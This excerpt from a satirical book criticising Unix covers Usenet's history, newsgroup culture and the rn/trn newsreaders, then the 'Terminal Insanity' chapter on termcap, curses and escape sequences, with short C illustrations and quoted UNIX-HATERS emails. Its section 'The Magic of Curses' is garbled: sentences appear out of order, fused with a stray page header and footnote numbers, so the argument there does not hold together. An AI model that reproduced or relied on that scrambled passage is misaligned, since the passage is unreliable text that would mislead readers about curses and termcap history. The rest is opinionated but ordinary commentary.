The origins of the term “net” are lost. The term “net” cropped up in Usenet discussions, and an informal caste system developed. The everyday people, called “net.folk” or “net.denizens,” who mostly read and occasionally posted articles, occupied the lowest rung. People well known for their particularly insightful, obnoxious, or prolific postings were called net.personalities. At the top rung were the

2 The first crawls, of course, occurred on the ARPANET, which had real computers running real operating systems. Before netnews exploded, the users of MIT-MC, MIT’s largest and fastest KL-10, were ready to lynch Roger Duffey of the Artificial Intelligence Laboratory for SF-LOVERS, a national mailing list that was rapidly taking over all of MC’s night cycles. Ever wonder where the “list-REQUEST” convention and digestification software came from? They came from Roger, trying to save his hide. They could be considered among the first hesitant crawls onto the information superhighway.
net.gods and, less frequently, net.wizards who had exhaustive knowledge of the newsgroup’s subject. Net.gods could also be those who could make big things happen, either because they helped write the Usenet software or because they ran an important Usenet site. Not surprisingly (especially not surprisingly if you’ve been reading this book straight through instead of leafing through it in the bookstore), the net.gods were often aloof, refusing to answer (for the umpteenth time) questions they knew cold. Like the gods of mythology, they could also be jealous and petty as well. They often withdrew from Usenet participation in a snit and frequently seemed compelled to make it a public matter. Terms like “net.god” are still used, albeit primarily by older hands. In these rude and crude times, you’re more likely to see terms like “net.jerk.”

The Great Renaming

As more sites joined the net and more groups were created, they often exceeded the built-in limits of the Unix tools that manipulated them. A receiving site that wanted only the technical groups forced the sending site to explicitly list all of them, which, in turn, required very long lines in the configuration files. In the early 1980s Rick Adams addressed the situation. Of course, the software would once again have to be changed, but that was okay: Rick had also become its maintainer. He studied the list of current groups and, like a modern day Linnaeus, categorized them into the “big seven” that are still used today:

    comp    Discussion of computers (hardware, software, etc.)
    news    Discussion of Usenet itself
    sci     Scientific discussion (chemistry, etc.)
    rec     Recreational discussion (TV, sports, etc.)
    talk    Political, religious, and issue-oriented discussion
    soc     Social issues, such as culture
    misc    Everything else

Noticeably absent was “mod.” Under the new scheme, the group name would no longer indicate how articles were posted; to a reader they all look the same. The proposed change was the topic of some discussion at the time. (That’s a Usenet truism: EVERYTHING is a topic of discussion at some time.) Most people didn’t care. A bigger topic of discussion was the so-called “talk ghetto.” Many of the “high-volume/low-content” groups were put into talk. (A typical summary of net.abortion might be “abortion is evil / no it isn’t / yes it is / science is not evil / it is a living being / no it isn’t…” and so on.) Users protested that it would be too easy for an administrator to drop those groups. Of course—that was the point! At the time most of Europe was connected to the United States via a long-distance phone call, and people in, say, Scandinavia did not care to read about—let alone participate in—discussion of Roe v. Wade. Usenet was controlled by Unix-thinking admins, and even though the users objected, the changes happened: software at major net sites silently rewrote articles to conform to the new organization. The name overhaul is called the Great Renaming. It went surprisingly smoothly, mostly accomplished in a few weeks. (It wasn’t clear where everything should go.)

Alt.flamage

At the time of the Great Renaming, Brian Reid had been moderating a group named “mod.gourmand.” People from around the world sent their favorite recipes to Brian, who reviewed them and posted them in a consistent format. He also provided scripts to save, typeset, and index the recipes, thereby creating a group personal cookbook—the ultimate vanity press. Over 500 recipes were published. Under the new scheme, mod.gourmand became “rec.food.recipes,” and Brian hated that prosaic name. John Gilmore didn’t like the absence of an unmoderated source group—people couldn’t give away code; instead, it had to go through a middleman. So, Brian and John got together with some other admins and created the “alt,” for alternative, hierarchy; it started with sites in the San Francisco Bay Area, that hotbed of 1960s radicalism and foment. Even though this appeared to be yet another short-sighted, short-term Unix-style patch, alt.gourmand and alt.sources were created. The major rule in “alt” is that anyone may create a group and anarchy (in the truest sense) reigns: each site decides what to carry. As you might expect, however, the Usenet cookbook didn’t appear in rec.food.recipes, and Brian quit moderating alt.gourmand fairly rapidly. Perhaps he went on a diet?

After a flamefest regarding the disposition of the newsgroup for the care and feeding of aquaria, two groups sprouted up—sci.aquaria and rec.aquaria. Usenet had become a slow-moving parody of itself. As a case in point, people now complain if the postings don’t contain “official”
archive names, descriptions, Makefiles, and so on. Alt.sources has become a clone of the moderated groups it sought to bypass. Meanwhile, alt.aquaria and rec.aquaria have given more forums for aquarium-owners to congregate.

This Information Highway Needs Information

Except for a few jabs at Unix, we’ve recited history without any real criticisms of Unix. Why have we been so kind? Because, fundamentally, Usenet is not about technology, but about sociology. Even if Unix gave users better technology for conducting international discussions, the result would be the same: a resounding confirmation of Sturgeon’s Law, which states that 90 percent of any field is crap. Usenet parodies itself. Most of the posters are male science and engineering undergraduates who rarely have the knowledge or maturity to conduct a public conversation. (It turns out that comparatively few women post to the Usenet; those who do are instantly bombarded with thousands of “friendly” notes from sex-starved net surfers hoping to score a new friend.) They also have far too much time on their hands. The demographics of computer literacy and, more importantly, Usenet access, are responsible for much of the lossage. The anonymity of the net reduces otherwise rational beings (well, at least computer literate beings) into six-year olds whose apogee of discourse is “Am not. Are so. Am not. Are so.…,” bringing all discussion down to the lowest common denominator.

A necessary but, unfortunately, not sufficient condition for a decent signal-to-noise ratio in a newsgroup is a moderator who screens messages. Without a moderator or a clearly stated and narrow charter such as many of the non-alt newsgroups have, the value of the messages inevitably drops. Without this simple condition, the result is a polarization of newsgroups: those with low traffic and high content, and those with high traffic and low content. As the quality newsgroups get noticed, more people join—first as readers, then as posters. Newsgroups with large amounts of noise rarely keep those subscribers who can constructively add to the value of the newsgroup. The polarization is sometimes a creeping force. After a few flame fests, the new group is as bad as the old. The original members of the new group either go off to create yet another group or they create a mailing list. Unless they take special care to
keep the list private (e.g., by not putting it on the list-of-lists), the list will soon grow and cross the threshold where it makes sense to become a newsgroup, and the vicious circle repeats itself.

rn, trn: You Get What You Pay for

Like almost all of the Usenet software, the programs that people use to read (and post) news are available as freely redistributable source code. This policy is largely a matter of self-preservation on the part of the authors:

• It’s much easier to let other people fix the bugs and port the code.

• Unix isn’t standard. Given the different Unix C compilers and libraries, the poor author doesn’t stand a chance in hell of being able to write code that will “just work” on all modern Unices.

• Even if you got a single set of sources that worked everywhere, different Unix C compilers and libraries would ensure that compiled files won’t work anywhere but the machine where they were built.

(Of course, you can even turn the reason around on its head and explain why this is a virtue of giving out the source.)

The early versions of Usenet software came with simple programs to read articles, called readnews and rna. These programs, unfortunately, were so simplistic that they don’t bear further discussion.

The most popular newsreader may be rn, written by Larry Wall. rn’s documentation claimed that “even if it’s not faster, it feels like it is.” rn shifted the paradigm of newsreader by introducing killfiles. Each time rn reads a newsgroup, it also reads the killfile that you created for that group (if it existed) that contains lines with patterns and actions to take. The patterns are regular expressions; unfortunately, they’re sort of similar to shell patterns, and visible inspection can’t distinguish between the two. This could cause problems if rn wasn’t careful about “Tricky” subjects. For example, if someone wanted to read only announcements but not replies, they could put “/Re:.*/” in the killfile. Killfiles let readers create their own mini-islands of Usenet within the babbling whole.

Like all programs, rn has had its share of bugs:

Date:    Thu, 09 Jan 1992 01:14:34 PST
From:    Mark Lottor <mkl@nw.com>
To:      UNIX-HATERS
Subject: rn kill

I was just trying to catch up on a few hundred unread messages in a newsgroup using rn. I watch the header pop up, and if the subject isn’t interesting I type “k” for the kill command. This says “marking subject <foo> as read” and marks all unread messages with the same subject as having been read. So what happens? I see a message pop up with subject "*******", and type “k.” Yep—it marks ALL messages as being read. Total lossage. No way to undo it. Screwed again.

—mkl

rn commands are a single letter, and there is no scripting language. Since there are many commands, some of the assignments make no sense. Why does “f” post a followup, and what does followup mean, anyway? One would like to use “r” to post a reply, but that means send reply directly to the author by sending mail. You can’t use “s” for mail because that means save to a file, and you can’t use “m” for mail because that means “mark the article as unread.” Like all programs, the help information is never complete. And who can decipher the jargon to really know what that means? Or, who can really remember the difference between “k”, “K”, “^K”, “.^K”, and so on? There is no verbose mode.

Every time Larry put out an official patch (and there were various unofficial patches put out by “helpful” people at times), sites all over the world applied the patch and recompiled their copy of rn. Larry introduced the idea of distributing fixes using a formalized message containing the “diff” output. This said: here’s how my fixed code is different from your broken code. Larry also wrote patch, which massages the old file and the description of changes into the new file.

rrn, Remote rn, a variant of rn, read news articles over a network. It’s interesting only because it required admins to keep two nearly identical programs around for a while, and because everyone sounded like a seal when they said the name.

trn, the latest version of rn, has merged in all the patches of rn and rrn and added the ability to group articles into threads. On the other hand, “it certainly seems faster.” A thread is a collection of articles and responses, and trn shows the “tree” by putting a little diagram in the upper-right corner of the screen as it’s reading. For example:

    +[1]-[1]-(1)
          \-[2]-[*]
          |     +-[1]
          +-[5]
    +[3]
     -[2]

No, we don’t know what it means either, but there are Unix weenies who swear by diagrams like this and the special nonalphabetic keystrokes that “manipulate” this information.

The rn family is highly customizable. On the other hand, only the true anal-compulsive Unix weenie really cares if killfiles are stored as $HOME/News/news/group/name/KILL, ~/News.Group.Name, or $DOTDIR/K/news.group.name. There are times when this capability (which had to be shoehorned into an inflexible environment by means of “% strings” and “escape sequences”) reaches up and bites you:

Date:    Fri, 27 Sep 91 16:26:02 EDT
From:    Robert E. Seastrom <rs@ai.mit.edu>
To:      UNIX-HATERS
Subject: rn bites weenie

So there I was, wasting my time reading abUsenet news, when I ran across an article that I thought I’d like to keep. Now, RN has this handy little feature that lets you pipe the current article into any unix program, so you could print the article by typing “| lpr” at the appropriate time, or you can mail it to yourself or some other lucky person by typing “| mail jrl@fnord.org” at the same prompt. Moreover, this article that I wanted to keep had direct relevance to what I do at work, so I wanted to mail it to myself there. We have a UUCP connection to uunet (a source of constant joy to me, but that's another flame), so I sent it to “rs%deadlock@uunet.uu.net”, because when I went to read my mail several hours later, I found this in my mailbox:

Date: Fri, 27 Sep 91 10:25:32 -0400
From: MAILER-DAEMON@uunet.uu.net (Mail Delivery Subsystem)

----- Transcript of session follows -----
>>> RCPT To:<rs/tmp/alt/sys/suneadlock@uunet.uu.net>
<<< 550 <rs/tmp/alt/sys/suneadlock@uunet.uu.net>... User unknown
550 <rs/tmp/alt/sys/suneadlock@uunet.uu.net>... User unknown

Apparently %d means something special to rn.

—Rob

When in Doubt, Post

    I put a query on the net
    I haven’t got an answer yet.

    —Ed Nather
    University of Texas, Austin

In the early days of Usenet, a posting could take a week to propagate throughout most of the net because, typically, each long hop was done as an overnight phone call. E-mail was often unreliable, so it made sense to post an answer to someone’s question, so that people there could see that the question had been answered. There was also the feeling that the question and your answer would be sent together to the next site in the line, to reduce volume. Those “early on” in the chain added new facts and even often moved on to something different, while those at the end of the line would receive messages often out of order or out of context. The net effect was that Usenet discussions often resembled a cross between a musical round-robin and the children’s game of telephone.

Usenet is much faster now; if you’re on the Internet, you can post an article and it can reach hundreds of sites in five minutes. Like the atom bomb, however, the humans haven’t kept up with the technology. People see an article and feel the rush to reply right away without waiting to see if anyone else has already answered. The software is partly to blame—there’s no good way to easily find out whether someone has already answered the question. Certainly ego is also to blame: Look, ma, my name in lights. As a result, questions posted on Usenet collect lots of public answers. They are often contradictory and many are wrong, but that’s to be expected. Free advice is worth what you pay for it.
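One partial remedy for all this free advice is the killfile described a few pages back. A minimal KILL file for a single group, sketched here from the “/pattern/” convention quoted earlier (the patterns other than “/Re:.*/” are made up for illustration), might read:

    THRU 12345
    /Re:.*/:j
    /MAKE MONEY FAST/:j
    /bandy@catnip/h:j

If memory of rn’s documentation serves, the trailing “:j” junks (marks as read) every matching article, an “h” before the colon asks rn to match against the article’s header rather than just its subject, and the THRU line records the highest article number already processed so rn needn’t rescan old news.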
To help lessen the frequency of frequently asked questions, many newsgroups have volunteers who periodically post articles, called FAQs, that contain the frequently asked questions and their answers, with illustrative examples. This seems to help some, but not always. There are often articles that say “where’s the FAQ” or, more rudely, say “I suppose this is a FAQ, but…”

Seven Stages of Snoozenet

By Mark Waks

The seven stages of a Usenet poster:

Innocence

HI. I AM NEW HERE. THIS (HEE, HEE) STUFF IS REAL NEAT. WHY DO THEY CALL THIS NEWSFROUP OOPS, I MEAN NEWSGROUP TALK.BIZARRE? I THINK THAT THEIR COOL. :-) <-- MY FIRST SMILEY. DOES ANYONE HAVE ANY BIZARRE DEAD BABY JOKES? DO YOU HAVE INTERESTING ONES? PLEASE POST SOME.

Enthusiasm

Wow! This stuff is great! But one thing I’ve noticed is that every time someone tries to tell a dead baby joke, everyone says that they don’t want to hear them. This really sucks. There are a lot of us who *like* dead baby jokes. Therefore, I propose that we create the newsgroup rec.humor.dead.babies specifically for those of us who like these jokes. Can anyone tell me how to create a newsgroup?

Arrogance

In message (3.14159@BAR), FOO@BAR.BITNET says:
>[dead chicken joke deleted]

This sort of joke DOES NOT BELONG HERE! Can’t you read the rules? Gene Spafford *clearly states* in the List of Newsgroups:

    rec.humor.dead.babies        Dead Baby joke swapping

Simple enough for you? It’s not enough that the creature be dead, it *must* be a baby—capeesh? This person is clearly scum—they’re even hiding behind a pseudonym. I mean, what kind of a name is FOO, anyway? I am writing to the sysadmin at BAR.BITNET requesting that this person’s net access be revoked immediately. If said sysadmin does not comply, they are obviously in on it—I will urge that their feeds cut them off post-haste, so that they cannot spread this kind of #%!T over the net.

Disgust

In message (102938363617@Wumpus), James_The_Giant_Killer@Wumpus writes:
> Q: How do you fit 54 dead babies in a Tupperware bowl?
> ^L
> A: La Machine! HAHAHA!

Are you people completely devoid of imagination? We’ve heard this joke *at least* 20 times, in the past three months alone! When we first started this newsgroup, it was dynamic and innovative. We would trade dead baby jokes that were truly fresh; ones that no one had heard before. Half the jokes were *completely* original to this group. Now, all we have are hacks who want to hear themselves speak. You people are dull as dishwater. I give up. I’m unsubscribing, as of now. You can have your stupid arguments without me. Good-bye!

Resignation

> People like this really burn me. We created r.h.d.b.new specifically
> to keep this sort of ANCIENT jokes out! Go away and stick with r.h.d.b
> until you manage to come up with an imagination.

Hey, wildman, chill out, okay? Look at it this way: at least they haven’t overwhelmed us yet. Keep your cool, and don’t let it bug you. When you’ve been around as long as I have, you’ll come to understand that twits are a part of life on the net. Most of the jokes in rec.humor.dead.babes.new are still fresh and interesting. We can hope that people like newby above will go lurk until they understand the subtleties of dead baby joke creation, but we should bear with them if they don’t.

Ossification

In message (6:00@cluck), chickenman@cluck (Cluck Kent) crows:
> In message (2374373@nybble), byte@nybble (J. Quartermass Public) writes:
>> In message (5:00@cluck), chickenman@cluck (Cluck Kent) crows:
>>> In message (2364821@nybble), byte@nybble (J. Quartermass Public) writes:
>>>> In message (4:00@cluck), chickenman@cluck (Cluck Kent) crows:
>>>>> Therefore, I propose the creation of rec.humor.dead.chicken.
>>>> The guidelines clearly state that you should be able to prove
>>>> sufficient volume for this group. I have heard no such volume in
>>>> rec.humor.dead.babies, so I must conclude that this proposal is a
>>>> sham and a fraud on the face of it. Before they go asking for this
>>>> newsgroup, I point out that they should follow the rules.
>>> The last time we tried to post a dead chicken joke to r.h.d.b, we
>>> were yelled at to keep out! How DARE you accuse us of not having
>>> the volume, you TURD?
>> This sort of ad hominem attack is uncalled for. My point is simply
>> this: if there were interest in telling jokes about dead chickens,
>> then we surely would have heard some jokes about dead *baby*
>> chickens in r.h.d.b. We haven’t heard any such jokes, so it is
>> obvious that there is no interest in chicken jokes.
> That doesn’t even make sense! Your logic is completely flawed.

It should be clear to people by now that this Cluckhead is full of it. There is no interest in rec.humor.dead.chicken (and undoubtedly, rec.humor.dead.chicken.new), so it should not be created. Doesn’t he realize that it will just take a few more newsgroups to bring this whole house of cards down around us? First, we get rec.humor.dead.chicken. Next, they’ll be asking for rec.humor.ethnic.newfy. By that time, all of the news admins in the world will have decided to drop us completely. Is that what you want, Cluck? To bring about the end of Usenet? Humph! I urge everyone to vote against this proposal. The current system works, and we shouldn’t push at it, lest it break.

Nostalgia

Well, they’ve just created rec.ethnic.humor.newfoundland and rec.humor.bizarre. My, how things have grown. It seems like such a short time ago that I first joined this net. At the time, there were only two newsgroups under the humorous banner: rec.humor and rec.humor.funny. I’m amazed at how things have split. Nowadays, you have to have 20 newsgroups in your sequencer just to keep up with the *new* jokes. Ah, for the good old days, when we could read about it all in one place.
6
Terminal Insanity

Curses! Foiled Again!

Unix is touted as an interactive system, which means that programs interact with the user rather than solely with the file system. The quality of the interaction depends on, among other things, the capabilities of the display and input hardware that the user has, and the ability of a program to use this hardware.

Original Sin

Unfortunately for us, Unix was designed in the days of teletypes. Teletypes support operations like printing a character, backspacing, and moving the paper up a line at a time. Since that time, two different input/output technologies have been developed: the character-based video display terminal (VDT), which outputs characters much faster than hardcopy terminals and, at the very least, can place the cursor at arbitrary positions on the screen; and the bit-mapped screen, where each separate pixel could be turned on or off (and in the case of color, each pixel could have its own color from a color map).

As soon as more than one company started selling VDTs, software engineers faced an immediate problem: different manufacturers used different control sequences to accomplish similar functions. Programmers had to find a way to deal with the differences.

Programmers at the revered Digital Equipment Corporation took a very simple-minded approach to solving the heterogeneous terminal problem. Since their company manufactured both hardware and software, they simply didn’t support terminals made by any other manufacturer. They then hard-coded algorithms for displaying information on the standard DEC VT52 (then the VT100, VT102, and so on) into their VMS operating system, application programs, scripts, mail messages, and any other system string that they could get their hands on. Indeed, within DEC’s buildings ZK1, ZK2, and ZK3, an entire tradition of writing animated “christmas cards” and mailing them to other, unsuspecting users grew up around the holidays. (Think of these as early precursors to computer worms and viruses.)

At the MIT AI Laboratory, a different solution was developed. Instead of teaching each application program how to display information on the user’s screen, these algorithms were built into the ITS operating system itself. A special input/output subsystem within the Lab’s ITS kernel kept track of every character displayed on the user’s screen and automatically handled the differences between different terminals. Adding a new kind of terminal only required teaching ITS the terminal’s screen size, control characters, and operating characteristics, and suddenly every existing application would work on the new terminal without modification. And because the screen was managed by the operating system, rather than each application, every program could do things like refresh the screen (if you had a noisy connection) or share part of the screen with another program. There was even a system utility that let one user see the contents of another user’s screen, useful if you want to answer somebody’s question without walking over to their terminal.

Unix (through the hand of Bill Joy) took a third approach. The techniques for manipulating a video display terminal were written and bundled together into a library, but then this library, instead of being linked into the kernel where it belonged (or put in a shared library), was linked with every single application program. When bugs were discovered in the so-called termcap library, the programs that were built from termcap had to be relinked (and occasionally recompiled). Because the screen was managed on a per-application basis, different applications couldn’t interoperate on the same screen. Instead, each one assumed that it had complete control (not a bad assumption, given the state of Unix at that time). And, perhaps most importantly, the Unix kernel still thought that it was displaying information on a conventional teletype.

As a result, Unix never developed a rational plan or model for programs to interact with a VDT. Half-implemented hack (such as termcap) after half-implemented hack (such as curses) have been invented to give programs some form of terminal independence, but the root problem has never been solved. Few Unix applications can make any use of “smart” terminal features other than cursor positioning. If your terminal has provisions for line drawing, protecting fields, scroll regions, line insert, line delete, double-height characters, inverse video, or programmable function keys, that’s just too darn bad: this is Unix. The most rational method for a system to support display devices is through an abstract API (Application Programmer’s Interface) that supports commands such as “backwards character,” “clear screen,” and “position cursor.” Unix decided the simplest solution was to not provide an API at all. Unix’s handling of character-based VDTs is so poor that making jokes about it can’t do justice to the horror.

The logical culmination of this catch-as-catch-can attitude is the X Window System, a monstrous kludge that solves these problems by replacing them with a much larger and costlier set of problems. Interestingly enough, the X Window System came from MIT, while the far more elegant NeWS, written by James Gosling, came out of Sun. How odd. It just goes to show you that the Unix world has its vision and it gets what it wants.

The advent of X and bitmapped screens won’t make this problem go away. If the Unix aficionados are right, and there really are many users for each Unix box (versus one user per DOS box), then well over two-thirds of the people using Unix are stuck doing so on poorly supported VDTs. There remain scads of VDTs hooked to Unixes in offices, executives’ pockets, and at the other end of modem connections. The most interactive tool they’re using is probably vi. Today, the most often used X application is xterm, a VT100 terminal emulator. And guess what software is being used to control the display of text? None other than termcap and curses!
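The complaint about “different control sequences to accomplish similar functions” is easy to make concrete. Below is a sketch (the helper names are ours, invented for illustration) of the same logical operation, moving the cursor to a row and column, encoded the way two popular terminals of the era actually expected it: the DEC VT100 used the ANSI sequence ESC [ row ; col H with 1-based decimal numbers, while the Lear Siegler ADM-3A wanted ESC = followed by the row and column each offset by 32 and sent as single bytes.

```c
#include <stdio.h>

/* Hard-coded escape sequences, one pair of functions per terminal
   model.  An application written this way needs another pair for
   every terminal it hopes to support -- which is the problem. */

/* DEC VT100 (ANSI): ESC [ <row+1> ; <col+1> H  (decimal, 1-based) */
int move_vt100(char *buf, int buflen, int row, int col)
{
    return snprintf(buf, buflen, "\033[%d;%dH", row + 1, col + 1);
}

/* Lear Siegler ADM-3A: ESC = <row+32> <col+32>  (single raw bytes) */
int move_adm3a(char *buf, int buflen, int row, int col)
{
    return snprintf(buf, buflen, "\033=%c%c", row + 32, col + 32);
}
```

Ask both terminals to move to row 4, column 9 (counting from zero) and the VT100 gets the bytes ESC [ 5 ; 1 0 H while the ADM-3A gets ESC = $ ). Same program, same intent, and not a byte in common after the ESC; this is precisely what termcap and curses were invented to paper over.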
The Magic of Curses Interactive programs need a model of the display devices they will control. Interestingly enough. written by James Gosling. protecting fields. and inverse video. Few Unix applications can make any use of “smart” terminal features other than cursor positioning.
2. 1 And if that wasn’t bad enough. incompatible terminal capability representation system called terminfo. those left out. . but not enough to overcome initial design flaws. there is still no standard API for character-based VDTs. This time. just like /etc/termcap itself has no standing. would have been the right choice. Ken inherited the vi brain damage when he decided to use the termcap file. three problems arose. tailored to the idiosyncracies of vi. it’s not a portable solution. only those portions that are relevant for vi are considered. Ken Arnold took it upon himself to write a library called curses to provide a general API for VDTs. This API had two fundamental flaws: 1. hard-wiring into themselves the escape sequences for the most popular terminals. could not be used by other programmers in their own code. Thus. and eschew character attributes that could make the screen easier to understand. learning from the mistakes of history. Instead.1 As a result. Starting over. AT&T developed its own. curses is not a very professional piece of code. Bill Joy provided his own API based on a terminal descriptor file called termcap. with the advent of vi. only part of the Unix community uses curses. They use characters like “|” and “-” and “+” to draw lines. The API engine. Eventually. In 1994. Time has somewhat ameliorated this problem. First. It doesn’t attempt to describe the different capabilities of terminals in general. And you can always tell a curses program from the rest: curses programs are the ones that have slow screen update and extraneous cursor movement. The format of the termcap file—the cursor movement commands included. it believes in simplicity over robustness. and the techniques for representing complex escape sequences—was.114 Terminal Insanity For many years programs kludged around the lack of a graphical API. even on terminals that sport line-drawing character sets. Third. Like most Unix tools. it’s just a library with no standing. 
developed for vi. other programs could read the escape sequences stored in a termcap file but had to make their own sense of which sequences to send when to the terminal. Second. and remains to this day. Therefore. As a result of these problems.
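For reference, a termcap entry is nothing exotic: a colon-separated list of two-letter capabilities, numeric (`co#80`), boolean, or string (`cl=\E[H\E[2J`, where `\E` stands for escape). The sketch below is our own illustration of the string-grubbing every non-vi program had to do for itself; it is not the historical code, and real termcap also handles continuation lines, `tc=` includes, and padding that this ignores.

```c
#include <stdio.h>
#include <string.h>

/* A vt100-style termcap entry (abridged).  "\\E" is the literal
   two-character sequence backslash-E that termcap uses for ESC. */
static const char *vt100 =
    "d0|vt100:co#80:li#24:cl=\\E[H\\E[2J:cm=\\E[%i%d;%dH:up=\\E[A:";

/* Copy the value of a string capability ("cl", "cm", ...) into buf.
   Returns buf on success, NULL if the capability is absent. */
char *tc_getstr(const char *entry, const char *cap, char *buf, size_t len)
{
    char pat[8];
    const char *p, *end;

    snprintf(pat, sizeof pat, ":%s=", cap);   /* look for ":cl=" etc. */
    p = strstr(entry, pat);
    if (p == NULL)
        return NULL;
    p += strlen(pat);
    end = strchr(p, ':');                     /* value runs to next ':' */
    if (end == NULL || (size_t)(end - p) >= len)
        return NULL;
    memcpy(buf, p, end - p);
    buf[end - p] = '\0';
    return buf;
}
```

Every program that skipped curses had to reinvent roughly this, and then also decide for itself what `%i` and `%d` in the `cm` string meant and when to send which capability.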
Senseless Separators

The myopia surrounding terminal handling has an historical basis. It begins with the idea that the way to view a text file is to send its characters to the screen. The logical structure of a text file is a collection of lines separated by some line separator token. A program that understands this structure should be responsible for displaying the file. One can dispense with this display program by arranging the line separator to be characters that, when sent to the terminal, cause it to perform a carriage return and a line feed. The newline as newline-plus-carriage-return is an example of how to prevent logical extension of the system.

For example, those in the Unix community most afflicted with microcephaly are enamored with the hack of generating files containing escape sequences that, when piped to the terminal, cause some form of animation to appear. They gleefully mail these off to their friends instead of doing their homework. It's a cute hack, good enough for a cottage industry, but these files work only on one kind of terminal. Now imagine a world with an API for directing the terminal and the ability to embed these commands in files. Now those files can be used on any terminal. More importantly, this API forms a basis for expansion: add sound to the API, and the system can now boast being "multi-media." Abstraction (an API) is important because it enables further extension of the system; it is a clean base upon which to build. The road to Hell is paved with good intentions and with simple hacks such as this: momentary convenience takes precedence over robustness and abstractness.

Fundamentally, some part of the OS should track the terminal type and provide the necessary abstraction barrier, but it must either be in the kernel or be a standard dynamically linked library. Some Unix zealots refuse to believe or understand this. They think that each program should send its own escape sequences to the terminal without requiring the overhead of an API. (Such an attitude is commensurate with the "everything is a stream of bytes" Unix mantra.) We have a proposal for these people. Let's give them a system in which the disk is treated the same way the terminal is: without an API. Application programs get to send raw control commands to the disk. This way, when a program screws up, instead of the screen containing gibberish, the disks will contain gibberish. Programs will be dependent on the particular disks installed on the system. Of course, such a proposal for controlling a hard disk is insanity, for doing so is an abstraction violation.
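That newline-to-CRLF mapping is still with us: in the Unix tty driver it is the ONLCR output flag. A stripped-down model of that output pass (the real line discipline does far more, tabs, delays, and all):

```c
#include <stddef.h>

/* Model of the tty driver's ONLCR output processing: every '\n' the
   program writes is silently expanded to "\r\n" on the way to the wire.
   out must hold up to 2*n + 1 bytes.  Returns the expanded length. */
size_t onlcr(const char *in, size_t n, char *out)
{
    size_t i, o = 0;
    for (i = 0; i < n; i++) {
        if (in[i] == '\n')
            out[o++] = '\r';   /* the carriage return the kernel sneaks in */
        out[o++] = in[i];
    }
    out[o] = '\0';
    return o;
}
```

This is also why a raw binary byte of 10 in an escape sequence gets mangled: the driver cannot tell a coordinate byte from a line separator.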
Every disk drive has its own characteristics: these differences are best handled in one place, by a device driver. Not every program or programmer is letter-perfect: operations like reading or writing to the disk should be done only in one place within the operating system, where they can be written once, debugged, and left alone. Why should terminals be treated any differently? Forcing programmers to be aware of how their programs talk to terminals is medieval, to say the least. Johnny Zweig put it rather bluntly:

Date: 2 May 90 17:23:34 GMT
From: zweig@casca.cs.uiuc.edu (Johnny Zweig)
Subject: /etc/termcap
Newsgroups: alt.peeves2

In my opinion as a scientist as well as a software engineer, there is no reason in the world anyone should have to know /etc/termcap even EXISTS, let alone have to muck around with setting the right environment variables so that it is possible to vi a file. This stuff ought to be handled 11 levels of software below the level at which a user types a command—the goddamned HARDWARE ought to be able to figure out what kind of terminal it is, and if it can't it should put a message on my console saying, "You are using piss-poor hardware and are a loser; give up and get a real job." It seems like figuring out what the hell kind of terminal I am using is not as hard as, say, landing men on the moon or launching nuclear missiles to within 10 yards of their targets; it is more on the order of, say, Tetris.

For those of us who use the X WINDOWS system to display WINDOWS on our workstations, some airhead has further messed up my life by seeing to it that most termcaps have the idea that "xterm" is an 80x65 line display. This idiot should be killed twice. 80x65 makes as much sense as reclining bucket seats on a bicycle—they are too goddamn big to fit enough of them on the screen. Why the hell hasn't this bull been straightened out after 30 goddamn years of sweat, blood, and tears on the part of people trying to write software that doesn't give its users the heebie-jeebies? And the first person who says "all you have to do is type 'eval resize'" gets a big sock in the nose for being a clueless geek who missed the point.

—Johnny Terminal

2 Forwarded to UNIX-HATERS by Olin Siebert.
This state of affairs, like institutionalized bureaucracies, would be livable (though still not acceptable) if there were a workaround. Unix offers no workaround; indeed, it gets in the way by randomly permuting control commands that are sent to the VDT. A program that wants to manipulate the cursor directly must go through more gyrations than an Olympic gymnast. For example, suppose that a program places a cursor at location (x, y) by sending an escape sequence followed by the binary encodings of x and y. Unix won't allow arbitrary binary values to be sent unscathed to the terminal. The GNU Termcap documentation describes the problem and the workaround:

Parameters encoded with '%.' encoding can generate null characters, tabs or newlines. These might cause trouble: the null character because tputs would think that was the end of the string, the tab because the kernel or other software might expand it into spaces, and the newline because the kernel might add a carriage-return, or padding characters normally used for a newline. To prevent such problems, tgoto is careful to avoid these characters. Here is how this works: if the target cursor position value is such as to cause a problem (that is to say, zero, nine or ten), tgoto increments it by one, then compensates by appending a string to move the cursor back or up one position.
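The dodge is easy to state in code. The escape prefix and the compensating "up"/"left" strings below are invented for illustration; the point is the tgoto-style rule: never emit NUL, tab, or newline, aim one cell past the target instead, and append a motion that backs up.

```c
#include <stddef.h>

static int unsafe(int v) { return v == 0 || v == '\t' || v == '\n'; }

/* Build a "move cursor to (row, col)" sequence whose coordinates travel
   as raw bytes.  If a coordinate would be 0, 9, or 10, overshoot until
   the byte is safe and append compensating motions, in the spirit of
   tgoto.  'U' (up one row) and 'L' (left one column) stand in for
   whatever strings a real terminal would need.  out must hold 8 bytes. */
size_t goto_rc(int row, int col, char *out)
{
    size_t n = 0;
    int fr = 0, fc = 0, i;

    while (unsafe(row + fr)) fr++;   /* skip past 0 / 9 / 10 */
    while (unsafe(col + fc)) fc++;

    out[n++] = '\033';               /* invented "position cursor" prefix */
    out[n++] = (char)(row + fr);
    out[n++] = (char)(col + fc);
    for (i = 0; i < fr; i++) out[n++] = 'U';   /* come back up */
    for (i = 0; i < fc; i++) out[n++] = 'L';   /* come back left */
    out[n] = '\0';
    return n;
}
```

Note that row 9 must overshoot by two, since 9 + 1 is 10, a newline, which is no improvement; that is the kind of corner the real tgoto has to dance around as well.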
Alan Bawden has this to say about the situation:

Date: Wed, 13 Nov 91 14:47:50 EST
From: Alan Bawden <Alan@lcs.mit.edu>
To: UNIX-HATERS
Subject: Don't tell me about curses

What this is saying is so brain damaged it brings tears to my eyes. On the one hand, Unix requires every program to manually generate the escape sequences necessary to drive the user's terminal; on the other, Unix makes it hard to send them. It's like going to a restaurant without a liquor license where you have to bring your own beer, and then the restaurant gives you a dribble-glass to drink it from.

Customizing your terminal settings

Try to make sense of this. The problem is that without a single coherent model of terminals, the different programs that do different tasks must all be told different vital statistics: telnet and rlogin track one set of customizations, tset another set, and stty yet a third. To compound the problem, these subsystems act as though they each belong to different labor unions: the subsystems take different commands and options depending on the local chapter they belong to, that is, which Unix they operate on (especially in the case of stty). Try to cope, and you'll soon find your .cshrc and .login files accumulating crufty snippets of kludgy workarounds, each one designed to handle a different terminal or type of network connection, working with some but not with others. (The notion of a transparent networked environment in Unix is an oxymoron.) Our following correspondent got hit with shrapnel from all these programs:

